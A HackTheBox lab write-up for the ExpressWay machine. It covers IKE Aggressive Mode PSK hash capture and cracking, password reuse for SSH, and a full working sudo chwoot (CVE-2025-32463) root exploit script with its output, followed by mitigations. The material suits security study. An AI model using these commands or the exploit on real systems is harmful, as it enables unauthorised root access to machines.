ExpressWay
Writeup for HackTheBox ExpressWay machine
Executive Summary
The ExpressWay machine is a Linux system exposing a legacy IKE VPN service and an outdated sudo binary. The attack chain is as follows:
- IKE Aggressive Mode → PSK Hash → Crack — UDP scan discovers ISAKMP (UDP 500). Enumerate with
ike-scanin Aggressive Mode to extract the PSK hash. Crack withpsk-crack/rockyou, yieldingfreakingrockstarontheroad. - Credential Reuse → SSH — The cracked VPN password is reused for SSH as user
ike. - CVE-2025-32463 (sudo chwoot) → Root —
sudo --versionreveals 1.9.17, vulnerable to the “chwoot” LPE. Deploy the PoC script that creates a malicious NSS library inside a fake chroot;sudo -Rloads the library and spawns a root shell.
Reconnaissance
TCP & UDP Scanning
Standard reconnaissance begins with a TCP port scan using Nmap to identify active network interfaces. Nmap (Network Mapper) is an open-source utility used for network discovery and security auditing.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ nmap -sC -sV 10.129.176.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-21 02:01 EDT
Nmap scan report for 10.129.176.13
Host is up (0.23s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
The initial TCP scan shows that only port 22/TCP (SSH) is open, which offers a minimal attack surface. To identify additional services that may be running on UDP, we perform a comprehensive UDP version scan. UDP scanning is slower and less reliable than TCP scanning because UDP is a connectionless protocol and does not guarantee a response (such as a TCP SYN-ACK). However, UDP scanning is critical for discovering administrative services like SNMP, TFTP, or IKE VPNs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ nmap -sU -sV 10.129.176.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-21 02:03 EDT
Stats: 0:03:07 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 20.38% done; ETC: 02:18 (0:12:11 remaining)
Nmap scan report for 10.129.176.13
Host is up (0.26s latency).
Not shown: 995 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open tftp Netkit tftpd or atftpd
500/udp open isakmp?
4500/udp open|filtered nat-t-ike
64481/udp open|filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=9/21%Time=68CF995C%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw\)\xe4\x86\xb7\xdaI~\xa9\x01\x10\x02\0\0
SF:\0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\
SF:x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x01
SF:\x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0\x
SF:14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,30
SF:C,"1'\xfc\xb08\x10\x9e\x89\xcf\xa8\x02\xc0}\x0b\x97j\x01\x10\x02\0\0\0\
SF:0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\
SF:x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03
SF:\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0
SF:\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\
SF:xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb
SF:\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f1'\xfc\xb08\x10\x9e\x89\xcf\xa8\x
SF:02\xc0}\x0b\x97j\x01\x10\x02\0\0\0\0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0
SF:\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x0
SF:2\0\x02\x80\x04\0\x02\x80\x03\0\x03\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0
SF:\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x
SF:86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\
SF:xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x
SF:1f1'\xfc\xb08\x10\x9e\x89\xcf\xa8\x02\xc0}\x0b\x97j\x01\x10\x02\0\0\0\0
SF:\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x
SF:20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\
SF:x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\
SF:x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\x
SF:d5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\
SF:x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f1'\xfc\xb08\x10\x9e\x89\xcf\xa8\x0
SF:2\xc0}\x0b\x97j\x01\x10\x02\0\0\0\0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\
SF:0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02
SF:\0\x02\x80\x04\0\x02\x80\x03\0\x03\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\
SF:x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x8
SF:6\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\x
SF:c2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1
SF:f1'\xfc\xb08\x10\x9e\x89\xcf\xa8\x02\xc0}\x0b\x97j\x01\x10\x02\0\0\0\0\
SF:0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x2
SF:0\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\x
SF:80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x
SF:14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd
SF:5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x
SF:80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1181.02 seconds
The UDP scan reveals several interesting services:
- TFTP (Port 69/UDP): Trivial File Transfer Protocol, a simple lockstep file transfer protocol that does not provide user authentication.
- ISAKMP (Port 500/UDP): Internet Security Association and Key Management Protocol, which is used to negotiate security associations (SA) for IPsec-based virtual private networks (VPNs).
- NAT-T IKE (Port 4500/UDP): Network Address Translation Traversal, which encapsulates IPsec ESP traffic within UDP packets to enable transmission through NAT gateways.
- Other filtered ports (Ports 68 and 64481): Discovered but not immediately accessible due to host-based or network firewall filtering.
Enumeration
IKE/IPsec Scanning
With UDP port 500 (ISAKMP) identified as active, we conduct IKE enumeration using ike-scan. This tool transmits IKE handshake proposals to determine supported encryption algorithms, hashing algorithms, Diffie-Hellman (DH) group values, and authentication methods.
We first transmit a default proposal request to analyze Main Mode configurations:
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ sudo ike-scan 10.129.176.13
[sudo] password for kali:
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.176.13 Main Mode Handshake returned HDR=(CKY-R=628129a9ad0fc034) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.313 seconds (3.20 hosts/sec). 1 returned handshake; 0 returned notify
The target returns a Main Mode response detailing the following cryptographic transform parameters:
- Encryption Algorithm: 3DES (Triple DES, which is legacy and weak).
- Hash Algorithm: SHA1 (legacy cryptographic hash function).
- Diffie-Hellman Group: Group 2 (1024-bit MODP group).
- Authentication Method: Pre-Shared Key (PSK).
- Vendor IDs (VID): Extended Authentication (XAUTH) and Dead Peer Detection (DPD) v1.0 are supported.
To retrieve the Pre-Shared Key hash, we must query the daemon in Aggressive Mode. Unlike Main Mode, which performs a three-way exchange designed to protect the identities of the negotiating parties, Aggressive Mode consolidates the negotiation parameters, Diffie-Hellman public value, and identity payloads into a single transmission. Crucially, in Aggressive Mode, the hash representing the Pre-Shared Key is sent unencrypted, allowing attackers to intercept and crack it offline.
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ sudo ike-scan -A 10.129.176.13
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.176.13 Aggressive Mode Handshake returned HDR=(CKY-R=21bc53b2894bcd70) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.283 seconds (3.54 hosts/sec). 1 returned handshake; 0 returned notify
┌──(kali㉿kali)-[~/HTB/ExpressWay]
The Aggressive Mode scan returns the user identity string:
- ID_USER_FQDN:
ike@expressway.htb
Capturing and Cracking the PSK Hash
With the identity established, we capture the Aggressive Mode handshake payload to write the raw PSK hash to a file for offline recovery:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ sudo ike-scan -M -A 10.129.176.13 --pskcrack=psk_hash.txt
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.176.13 Aggressive Mode Handshake returned
HDR=(CKY-R=96bbb1fa49256a84)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.289 seconds (3.45 hosts/sec). 1 returned handshake; 0 returned notify
The capture is stored in psk_hash.txt. We now use the tool psk-crack to run a dictionary attack against this hash using the standard rockyou.txt wordlist:
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$sudo psk-crack -v -d /usr/share/wordlists/rockyou.txt psk_hash.txt 2>&1 | tee psk_crack_log.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Loaded 1 PSK entries from psk_hash.txt
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 1b01568a6ee2f24b561858ff0027d776ff0ccf47
Ending psk-crack: 8045040 iterations in 15.387 seconds (522845.37 iterations/sec)
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$
The dictionary attack is successful and yields the plaintext PSK value: freakingrockstarontheroad.
Initial Access as ike
Using the cracked pre-shared key, we test whether this password has been reused for system access. Port 22 (SSH) is verified as open, and we attempt to authenticate using the user name ike and the discovered credential.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/HTB/ExpressWay]
└─$ ssh ike@10.129.176.13
The authenticity of host '10.129.176.13 (10.129.176.13)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:13: [hashed name]
~/.ssh/known_hosts:16: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.176.13' (ED25519) to the list of known hosts.
ike@10.129.176.13's password:
Last login: Wed Sep 17 12:19:40 BST 2025 from 10.10.14.64 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 07:36:42 2025 from 10.10.14.82
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat *
42de180fec8126decb115fc9cb8c39bc
ike@expressway:~$
The credential reuse is verified, providing local user shell access and the user flag.
Privilege Escalation
We begin local system enumeration by examining the sudo configuration to determine if the ike user has permission to execute administrative commands.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ike@expressway:~$ sudo -v
Sorry, user ike may not run sudo on expressway.
ike@expressway:~$
ike@expressway:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
For security reasons, the password you type will not be visible.
Password:
Sorry, try again.
Password:
Sorry, user ike may not run sudo on expressway.
The user ike is not in the sudoers file. We then query the file properties and version of the installed sudo binary to search for known software vulnerabilities.
1
2
3
4
5
6
7
8
9
10
ike@expressway:~$ ls -l "$(which sudo)"
-rwsr-xr-x 1 root root 1047040 Aug 29 15:18 /usr/local/bin/sudo
ike@expressway:~$
ike@expressway:~$ /usr/local/bin/sudo --version | tee sudo_version.txt
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$
CVE-2025-32463
The target is running Sudo version 1.9.17, which is vulnerable to CVE-2025-32463 (also known as the “chwoot” vulnerability). This security flaw is a local privilege escalation (LPE) issue in sudo’s chroot implementation (the -R or --chroot command-line argument).
When sudo processes a chroot command, it enters the target directory namespace. However, it fails to properly secure libraries loaded during the initialization of system plugins or identity services (like PAM or NSS) inside the new root directory. If a user can trigger the chroot execution, an attacker can create a fake root directory structure containing a malicious Name Service Switch (NSS) configuration and library. When sudo executes and performs user lookup operations, it will load the attacker’s custom NSS shared library from inside the fake chroot, running arbitrary code as root.
Exploit Overview
We leverage the public Proof-of-Concept (PoC) script sudo-chwoot.sh by Rich Mirch to execute the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
if [ $# -eq 0 ]; then
# If no command is provided, default to an interactive root shell.
CMD="/bin/bash"
else
# Otherwise, use the provided arguments as the command to execute.
CMD="$@"
fi
# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
The script works by performing the following actions:
- It creates a temporary directory and generates a C payload (
woot1337.c) with a__attribute__((constructor))directive. This constructor executes automatically as soon as the compiled shared library is loaded by a process. - The payload resets the real/effective user and group IDs to 0 (
root) and invokes/bin/sh. - It compiles the C code into a shared object named
libnss_/woot1337.so.2. - It sets up a nested directory structure
woot/etc/and writes annsswitch.conffile containingpasswd: /woot1337, instructing the NSS engine to resolve passwd lookups via thewoot1337service provider. - It runs
sudo -R woot woot. Sudo enters the chroot/tmp/.../woot. To resolve the user/group information of the execution context, it reads/etc/nsswitch.conf(which points to/woot1337), prompting Sudo to loadlibnss_woot1337.so.2from the library paths. - The shared library executes the payload constructor, spawning a root shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
ike@expressway:~$ nano sudo-chwoot.sh
ike@expressway:~$
ike@expressway:~$ chmod +x sudo-chwoot.sh
ike@expressway:~$
ike@expressway:~$ ./sudo-chwoot.sh
woot!
root@expressway:/#
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/#
root@expressway:/# cat /root/root.txt
7e3fa16cf20cd8826aa32bd1066796c1
root@expressway:/#
The exploit triggers successfully, providing an interactive shell running under the root security context.
Mitigations & Security Recommendations
- Secure VPN Configuration:
- Disable IPsec Aggressive Mode on the IKE daemon. Aggressive Mode leaks user identities and PSK hashes in an unencrypted state. Standardize on Main Mode, which uses an encrypted payload exchange to protect negotiating credentials.
- Replace weak Pre-Shared Keys with strong, randomly generated keys of at least 256 bits, or migrate to certificate-based authentication using a secure Public Key Infrastructure (PKI).
- Remediation of CVE-2025-32463:
- Upgrade the
sudopackage immediately to version 1.9.18 or later. This version contains patches that prevent namespace breakout and unsafe library loading within a chrooted directory structure.
- Upgrade the
- Password Policy and Credential Management:
- Enforce strict password complexity and uniqueness requirements across all system accounts to prevent credential reuse vulnerabilities, such as utilizing the VPN password for SSH system access.
